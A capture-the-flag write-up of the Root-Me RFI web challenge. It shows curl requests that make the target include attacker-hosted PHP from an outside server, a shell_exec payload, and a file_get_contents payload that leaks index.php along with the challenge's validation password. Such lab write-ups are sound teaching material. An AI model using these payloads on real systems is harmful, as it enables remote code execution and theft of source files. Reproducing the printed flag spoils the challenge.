Rootme RFI
Root-me.org
Remote File Inclusion
Abbreviated RFI
In this challenge we need to find the php source code of the page. The title ays it’s related to RFI. If we take a look at the challenge page we notice that the page is taking the language as a parameter.
http://challenge01.root-me.org/web-serveur/ch13/?lang=fr
That parameter is most probably the vulnerable part. Let’s try to change it to something random and see how the server responds.
curl http://challenge01.root-me.org/web-serveur/ch13/?lang=haha
Warning: include(haha_lang.php): failed to open stream: No such file or directory in /challenge/web-serveur/ch13/index.php on line 18
Warning: include(): Failed opening 'haha_lang.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /challenge/web-serveur/ch13/index.php on line 18
...
We get a warning saying that haha_lang.php couldn’t be open because it doesn’t
exist. So the web server is appending _lang.php
to the parameter. Let’s try
to load a page from an external website.
We know that it’s adding _lang.php
, we’ll create a php file that will have as
name cmd_lang.php
.
Our php script will use shell_exec() to call the command ls
on the machine.
<?php echo shell_exec(ls); ?>
Now, we’ll put our script a the server where this page is currently hosted. If
you don’t have a webserver, you can use the command
sudo python -m SimpleHTTPServer 80
to host the php file. You will most
probably need to forward the port in your router also.
So now that the file is in our webserver, let’s do the RFI. The file is called yo_lang.php.
curl http://challenge01.root-me.org/web-serveur/ch13/?lang=https://get.uid0.in/yo
-Ringzer0-188.html
Asisctf.html
Billu_b0x.html
Brainpan2.html
Brainspan1.html
...
So what happened is that the command ran in our server instead of their server.
We got the result of ls
from our webserver. After some research, this
happened because mine web server interpreted by our php in our webserver. To
fix it we need to tell our web server to not execute it as php.
To do that we’ll put in our .htaccess the following content.
<Files *.php>
SetHandler None
</Files>
This will prevent the file from behind executed by php. We’ll resend the command and see the result.
curl http://challenge01.root-me.org/web-serveur/ch13/?lang=https://get.uid0.in/yo
Warning: shell_exec() has been disabled for security reasons in https://get.uid0.in/yo_lang.php on line 4
...
So shell_exec() is disabled, so is exec, system, passthru. We need to find another way. I’ll use a command we previously used to read a file.
The php function file_get_contents allows us to read a file. We’ll put that in a variable then echo that variable.
<?php
$yo=file_get_contents ("index.php");
echo $yo;
?>
~
Let’s try to run it again.
curl http://challenge01.root-me.org/web-serveur/ch13/?lang=https://get.uid0.in/yo
<?php
/*
Congratz!
Le mot de passe de validation est :
The validation password is :
R3m0t3_iS_r3aL1y_3v1l
*/
...
And there it is.